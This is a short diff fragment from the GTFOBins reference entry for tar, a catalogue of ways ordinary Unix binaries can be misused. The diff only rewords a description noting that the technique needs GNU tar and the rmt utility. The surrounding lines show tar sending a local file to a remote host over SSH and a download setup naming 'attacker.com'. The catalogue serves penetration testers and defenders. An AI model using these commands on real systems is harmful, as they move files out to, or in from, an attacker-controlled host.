GTFOBins/GTFOBins.github.io/_gtfobins/tar.md

         export LFILE=file_to_send
         tar cvf $RUSER@$RHOST:$RFILE $LFILE --rsh-command=/bin/ssh
   file-download:
-    - description: Download and extract a tar archive via SSH.
-The attacker box must have the rmt utility installed.
+    - description: This only works for GNU tar.
+Download and extract a tar archive via SSH.
+The attacker box must have the `rmt` utility installed (it should be present by default in Debian-like distributions).
       code: |
         export RHOST=attacker.com
         export RUSER=root